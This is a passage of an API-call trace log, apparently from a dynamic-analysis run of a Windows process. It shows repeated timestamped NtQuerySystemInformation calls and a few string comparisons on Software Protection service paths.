ResultLength=0x0) [0231.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0231.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0231.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0231.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0231.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0231.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0231.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0231.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0231.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0231.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0231.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0231.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0231.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0231.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0231.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0231.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0231.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0231.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0231.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0231.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0231.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0231.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0231.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd418, Length=0x30, ResultLength=0x0) [0231.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x38, ResultLength=0x0) [0231.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0231.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0231.633] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0231.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0231.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0231.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0231.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0231.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0231.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0231.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0231.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0231.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0231.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0231.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0231.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0231.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0231.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0231.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0231.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0231.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0231.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0231.711] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0231.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0231.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0231.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0231.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0231.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0231.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0231.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0231.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0231.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0231.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0231.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0231.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0231.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0231.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0231.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0231.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0231.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0231.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0231.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0231.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0231.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0231.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd870, Length=0x28, ResultLength=0x0) [0231.721] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0231.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0231.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0231.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd8f0, Length=0x50, ResultLength=0x0) [0231.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0231.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0231.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0231.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0231.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6c0, Length=0x28, ResultLength=0x0) [0231.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0231.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd740, Length=0x28, ResultLength=0x0) [0231.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd740, Length=0x28, ResultLength=0x0) [0231.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0231.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x20, ResultLength=0x0) [0231.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd620, Length=0x20, ResultLength=0x0) [0231.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd620, Length=0x20, ResultLength=0x0) [0231.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd620, Length=0x20, ResultLength=0x0) [0231.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd820, Length=0x38, ResultLength=0x0) [0231.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x20, ResultLength=0x0) [0231.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x20, ResultLength=0x0) 